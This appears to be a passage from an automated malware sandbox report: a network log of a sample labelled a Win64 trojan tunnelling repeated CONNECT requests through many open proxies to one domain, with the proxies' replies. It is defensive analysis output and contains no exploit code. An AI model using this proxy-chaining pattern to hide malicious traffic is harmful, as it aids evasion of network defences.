                                                                                Feb 23, 2024 14:28:26.840306044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                691192.168.2.85218543.132.212.77805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.840337992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                692192.168.2.852327134.209.189.42805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.843827963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.999340057 CET327INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                693192.168.2.8521758.213.129.20202015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.843831062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.156032085 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                694192.168.2.850811103.180.198.16281815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.844084024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.991764069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                695192.168.2.852320193.242.210.140805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.853096962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.096829891 CET1286INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Server: Apache
                                                                                X-Powered-By: PHP/5.3.3-7+squeeze17
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                Last-Modified: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Expires: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                X-Content-Security-Policy: allow 'self'; frame-ancestors 'none'
                                                                                X-Frame-Options: DENY
                                                                                X-Content-Type-Options: nosniff
                                                                                Vary: Accept-Encoding
                                                                                Content-Length: 3042
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 44 65 66 61 75 6c 74 2d 53 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 68 74 6d 6c 35 73 68 69 76 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 0a 09 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 74 65 6d 70 6c 61 74 65 73 2f 46 72 6f 78 6c 6f 72 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 74 65 6d 70 6c 61 74 65 73 2f 46 72 6f 78 6c 6f 72 2f 63 73 73 2f 6d 61 69 6e 5f 69 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 6a 71 75 65 72 79 2e 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 74 65 6d 70 6c 61 74 65 73 2f 46 72 6f 78 6c 6f 72 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 74 65 6d 70 6c 61 74 65 73 2f 46 72 6f 78 6c 6f 72 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 3c 74 69 74 6c
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta http-equiv="Default-Style" content="text/css" /><script type="text/javascript" src="js/jquery.min.js"></script><script type="text/javascript" src="js/jquery-ui.min.js"></script>...[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]--><link href="templates/Froxlor/assets/css/main.css" rel="stylesheet" type="text/css" />...[if IE]><link rel="stylesheet" href="templates/Froxlor/css/main_ie.css" type="text/css" /><![endif]--><link href="css/jquery.jquery-ui.css" rel="stylesheet" type="text/css"/><script type="text/javascript" src="templates/Froxlor/assets/js/main.js"></script><link href="templates/Froxlor/assets/img/favicon.ico" rel="icon" type="image/x-icon" /><titl
                                                                                Feb 23, 2024 14:28:27.096860886 CET1286INData Raw: 65 3e 46 72 6f 78 6c 6f 72 20 53 65 72 76 65 72 20 4d 61 6e 61 67 65 6d 65 6e 74 20 50 61 6e 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20
                                                                                Data Ascii: e>Froxlor Server Management Panel</title><style type="text/css">body { font-family: Verdana, Geneva, sans-serif;}</style></head><body><div class="loginpage"><article class="login bradius"><header class="dark">
                                                                                Feb 23, 2024 14:28:27.096946001 CET941INData Raw: 69 6f 6e 20 76 61 6c 75 65 3d 22 50 6f 72 74 75 67 75 26 61 6d 70 3b 65 63 69 72 63 3b 73 22 20 20 3e 50 6f 72 74 75 67 75 26 65 63 69 72 63 3b 73 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 52 75 73 73 69 61 6e 22 20
                                                                                Data Ascii: ion value="Portugu&amp;ecirc;s" >Portugu&ecirc;s</option><option value="Russian" >Russian</option><option value="Danish" >Danish</option><option value="Italian" >Italian</option><option value="Bulgarian" >Bulgarian</option><option value="
                                                                                Feb 23, 2024 14:28:27.137445927 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 9d 7a 01 fc 4a c3 e0 6e aa 36 96 ab 74 76 88 50 80 e3 ac d3 88 80 60 a2 2e fb 8f a3 1c c7 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                Data Ascii: ezJn6tvP`.*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#$lHWvW}gyf!0IDL\
                                                                                Feb 23, 2024 14:28:27.388284922 CET1286INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta http-equiv="Default-Style" content="text/css" /><script type="text/javascript" src="js/jquery.min.js"></script><script type="text/javascript" src="js/jquery-ui.min.
                                                                                Feb 23, 2024 14:28:27.388314009 CET1286INData Raw: 65 64 22 3e 0a 09 09 09 09 3c 66 69 65 6c 64 73 65 74 3e 0a 09 09 09 09 3c 6c 65 67 65 6e 64 3e 46 72 6f 78 6c 6f 72 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 4c 6f 67 69 6e 3c 2f 6c 65 67 65 6e 64 3e 0a 09 09 09 09 3c 70 3e 0a 09 09 09 09 09 3c 6c
                                                                                Data Ascii: ed"><fieldset><legend>Froxlor&nbsp;-&nbsp;Login</legend><p><label for="loginname">Username:</label>&nbsp;<input type="text" name="loginname" id="loginname" value="" required/></p><p><label for="passwo
                                                                                Feb 23, 2024 14:28:27.388334990 CET470INData Raw: 3e 3c 2f 73 65 6c 65 63 74 3e 0a 09 09 09 09 3c 2f 70 3e 0a 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 73 65 6e 64 22 20 76
                                                                                Data Ascii: ></select></p><p class="submit"><input type="hidden" name="send" value="send" /><input type="submit" value="Login" /></p></fieldset></form><aside><a href="index.php?action=forgotpwd">Forgot y


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                696192.168.2.85228187.126.65.1113885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.857873917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.491756916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.195008039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382950068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.882529974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.406423092 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                697192.168.2.8522258.213.128.90100005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.891608000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.173731089 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                698192.168.2.85216651.68.164.7753675828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.891817093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.695128918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.882612944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991846085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                699192.168.2.852360162.159.241.160805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.892090082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.979438066 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                700192.168.2.85215181.70.253.15280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.897989035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                701192.168.2.85235192.205.185.251505395828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.898348093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.491753101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991868973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                702192.168.2.852191103.216.49.23380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.898361921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                703192.168.2.852337212.77.163.19631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.898721933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.491832972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.673233986 CET923INHTTP/1.1 503 Service Unavailable
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 782
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 68 74 6d 6c 20 62 6f 64 79 20 7b 20 6d 61 72 67 69 6e 3a 20 31 30 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 7d 0a 20 23 63 6f 6e 74 65 6e 74 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 20 7d 20 0a 20 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 22 3e 3c 68 31 3e 41 63 63 65 73 73 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 6f 72 20 55 52 4c 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 63 6f 72 70 6f 72 61 74 65 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 75 73 61 67 65 20 61 6e 64 20 77 65 62 20 73 75 72 66 69 6e 67 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 6e 20 63 61 73 65 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 00
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css"> * { font-family: verdana, sans-serif;} html body { margin: 10; padding: 10; background: #efefef; font-size:12px; color: #1e1e1e; float: left; } #content { font-size: 14px; color: #1e1e1e; } </style></head><body><div id="title"><h1>Access Blocked</h1></div><hr><div id="content">Access to the requested application or URL has been blocked in accordance with the corporate application usage and web surfing policy. Please contact your system administrator in case you believe this is an error.</p></div></body></html>
                                                                                Feb 23, 2024 14:28:27.687227011 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:28:28.263854980 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:28:28.840200901 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:28:29.992017984 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:28:32.232305050 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:28:36.843442917 CET39INHTTP/1.1 200 Connection established
                                                                                Feb 23, 2024 14:28:46.055948973 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                704192.168.2.852252203.74.125.1888885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.907381058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                705192.168.2.852115103.182.213.100805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.907649994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                706192.168.2.85121745.140.88.219805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.907651901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                707192.168.2.85233520.206.106.192805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.908332109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.123410940 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                708192.168.2.85183472.210.252.13741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.919332027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                709192.168.2.85229320.219.183.18831295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.919341087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.253648043 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
